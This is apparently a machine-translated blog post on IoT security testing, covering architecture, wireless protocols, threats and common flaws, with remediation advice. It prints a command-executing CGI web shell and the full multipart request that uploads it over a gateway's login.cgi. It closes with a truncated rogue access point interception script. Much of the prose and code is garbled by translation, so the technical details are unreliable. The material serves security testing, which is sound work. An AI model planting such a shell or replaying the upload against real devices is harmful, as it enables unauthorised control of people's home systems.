IoT: A summary of the safety testing experience of IoT safety test

Preface

Earlier this year, I was involved in a number of security tests on the Internet of things solutions. The primary goal is to identify vulnerabilities in the architecture and solutions. In this article, I'll discuss some of the issues and challenges with the IoT solutions. What is the Internet of things.

When you learn about IPV6, your teacher may have said that one day in your house every device will have an IP. The internet of things is basically about dealing with daily affairs and connecting them to the Web. Some common things networking equipment: such as lighting, curtains, air-conditioning. There are also less common devices such as refrigerators and even a bathroom. (Practical application)

The Internet of Things is defined as: "The development of the Web, the daily items have network connectivity, allow, send and receive data." ”。 The architecture of Internet of Things

There are usually five parts: actuators: Controlling things through physical processes, such as air conditioning units, locks, curtains, gateways: used to collect sensor information and control center sensors: for detecting environments such as light, motion, temperature, humidity, water/electricity, Cloud: The Web interface or API hosts the cloud Web application and large dataset analysis used to collect data. In general, is used to do information and other resources to share, mobile (APP): Mobile devices are mostly used in the device applications, to achieve mobile phone-side control IoT environment to interact

These wireless protocols (and more) are commonly used by the control sensors and actuators of the IoT environment itself (and more): Wifi zwave ZigBee Bluetooth RF433

Each protocol has its pros and cons, and there are a number of limitations. When it comes to choosing which protocol, the biggest problem is compatibility. The following table shows a quick comparison between protocols:

The main driver uses a specific protocol. For example, rf433 has been used for a wide range of uses, but does not have a mesh network and default security mechanisms. This means that if you want security, you have to come up with your own agreement, which means that your users will use off-the-shelf sensors or devices. ZigBee and Zwave are to a large extent the same. The main difference between them is in the communication range of the equipment.

You can learn more from the ZigBee security technology white Paper, and there is a related document here. threat Vectors

Any security assessment requires you to know who your enemies are and how they will attack the system and misuse them. When I do a threat guide, I think the information that the device contains in the environment, where all these drives are, is likely to pose a risk. A thing-networking device that is hacked may be used to target the internet environment or simply become a botnet that is used to attack external networks (or combination of both). You should evaluate what can affect the actuator and how to determine that the value of the sensor may affect the environment. To do this, you have to understand how the IoT ecosystem works, what types of devices may be used, and how the impact may be expanded.

Common vulnerabilities in Internet of things an unauthenticated update mechanism Sql/json injection design logic too trusting an unauthenticated update mechanism

There are many different ways to update packages. Some people use traditional package managers in Linux systems, using fewer traditional tools, such as executable programs, that run on computers on the same network to reverse updates from a cloud environment. The biggest problem with these newer mechanisms is that they do not use secure means to provide software packages. For example, using a single executable mechanism, access to a hidden API is used to replace files at the gateway. All you need to do is upload the CGI file to replace the existing file. In this particular case the gateway is to bash the CGI run, so upload your own shell:

#!/bin/sh
 
echo-e "content-type:text/html\r\n\r\n" "
 
echo" Blaat "
#echo" $QUERY _string "
cmd=" $QUERY _ STRING '
test2=$ (echo $CMD | sed ' s|[ \]|| G ' | Sed ' s|%20| |g ')
$test 2

Request:

POST http://192.168.1.98:8181/fileupload.cgi http/1.1
content-type:multipart/form-data boundary=------ 7cf2a327f01ae
user-agent:redacted
host:192.168.1.98:8181
content-length:482
Pragma:no-cache
 
--------7cf2a327f01ae
Content-disposition:form-data; Name= "Auth"
 
11366899
--------7cf2a327f01ae
content-disposition:form-data; name= "type"
 
w
- -------7cf2a327f01ae
content-disposition:form-data name= "file"; filename= "C:\REDACTED configurator\output\ login.cgi "
#!/bin/sh
 
echo-e" content-type:text/html\r\n\r\n "
 
echo" Blaat "
#echo" $QUERY _ STRING "
cmd=" $QUERY _string
test2=$ (echo $CMD | sed ' s|[ \]|| G ' | Sed ' s|%20| |g ')
$test 2
--------7cf2a327f01ae

You should be able to guess what happens next:

My advice is to take advantage of existing solutions, such as the update Package Manager, and if you have to roll out your own update package, verify it before you install the deployment. Sql/nosql Injection

SQL injection has been a long time loophole, of course, the injection vulnerability arises because the program development process does not pay attention to the specification of the writing of SQL statements and special characters to filter, resulting in a global variable post and get commit some SQL statements normal execution. We can see a lot of solutions, many developers do not think that this is a NoSQL database problem or just don't know it is a problem. Here, my advice is to make sure that proper input validation and filtering are done. There is no case study here, but you can look at this article websecurify. design logic and too much trust

Because there are no reference architectures available, we see a lot of architectures, and while the framework makes things easier, it can be a big risk threat and a single component can be compromised. In addition, we see developers believe that traditional user input in communications is not a threat. In one such instance, we note that there is no authentication from the gateway identifier (which we can easily enumerate) when intercepting communication between the gateway and the cloud. This leads to the injection of information that we can get to other users. Some other examples include: mobile applications are logged in directly to the database (all devices use the same password) local network traffic unencrypted message not signed or encrypted easily violent enumeration or irrevocable information (such as birth and name) used as an API key to identify a user's gateway through obscurity of security Internal development of cryptographic algorithms

I suggest here that the information at the receiving end is appropriately encoded to handle malicious information, which means that the client should not provide plaintext information to the server and client. Generally use auditing and validation frameworks. If the device is hosted on the network, do not expect any input to be trustworthy. Use appropriate encryption (HTTPS) in all communications if the certificate is invalid, the Open API key is fairly common to determine a particular gateway. Because the server for this identifier is the authentication token, you need to make sure that the qualifier is randomly generated using the password security rng. It is generally recommended to use 128-bit (32 characters). Even the most well-known cryptographic scientists cannot guarantee the hundred percent security of their algorithms.

Many times users want to use their own mobile phones to remotely control their services at home. For example, turn on the air conditioner or open the door. This raises the question that your gateway is typically located behind the router, not directly from the Internet. Some solutions do not require port forwarding, but this also requires a dynamic DNS solution that requires user configuration.

What the general company does is that the mobile app sends the instructions to the cloud, and then the gateway gets the instructions from the cloud.

Conclusions

People always want to give everything to the Internet, but there are often serious security errors. Most of the errors are due to ambiguous security objectives, lack of experience and awareness. Instead of expecting them to give us security, we must adopt a secure networking strategy.

Some things networking Secure Solutions Reference: GSMA IoT security Guidelines–complete Document Set OWASP Internet of Things (IoT) Project AllJoyn Allian Ce (this is a framework under development to secure communication in the IoT environment) iotivity (soon'll be merged WI Th AllJoyn)

Share a script, through the agent to do a gateway from the Internet of Things to intercept. Can be used for security testing:

#!/bin/sh echo "Interface with Internet connectivity:" Read Iinf Echo secondary Interface with rogue device: "Read Winf echo "Stopping network manager ..." Service Network-manager stop echo stopping dnsmasq ... "Service dnsmasq stop echo" B Ringing down Wireless interface ... "Ifconfig $wInf down echo" Configuring wireless ... "interface $wInf 192.168. 1.1 Netmask 255.255.255.0 echo "Starting DNSMASQ as DHCP server ..." dnsmasq--no-hosts--interface $wInf--except-interfa Ce=lo--listen-address=192.168.1.1--dhcp-range=192.168.1.50,192.168.1.60,60m--dhcp-option=option:router, 192.168.1.1--dhcp-lease-max=25--pid-file=/var/run/nm-dnsmasq-wlan.pid echo "Stopping firewall and allowing everyone  ... "iptables-f iptables-x iptables-t nat-f iptables-t nat-x iptables-t mangle-f iptables-t mangle-x iptables-p INPUT ACCEPT iptables-p FORWARD ACCEPT iptables-p OUTPUT ACCEPT echo "Enabling NAT ..." iptables-t nat-a postrouting  -O $IINF